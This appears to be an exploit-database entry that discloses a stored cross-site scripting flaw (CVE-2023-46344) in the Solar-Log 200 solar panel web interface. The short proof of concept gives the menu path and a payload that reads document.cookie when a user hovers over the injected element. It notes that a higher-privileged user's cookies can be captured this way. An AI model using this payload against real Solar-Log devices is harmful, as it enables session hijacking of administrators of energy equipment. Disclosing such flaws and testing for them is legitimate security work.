## https://sploitus.com/exploit?id=1337DAY-ID-39411
# Exploit Title: Stored XSS in Solar-Log 200 3.6.0 web panel
# Exploit Author: Vincent McRae, Mesut Cetin - Redteamer IT Security
# Vendor Homepage: https://www.solar-log.com/en/
# Version: Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019
# Tested on: Proprietary devices: https://www.solar-log.com/en/support/firmware/
# CVE: CVE-2023-46344
# POC:
1. Go to solar panel
2. Go to configuration -> Smart Energy -> "drag & drop" button.
3. Change "name" to: <xss onmouseenter="alert(document.cookie)"
4. Once you hover over "test", you get XSS -> if a higher privileged
user hovers over it, we can get their cookies.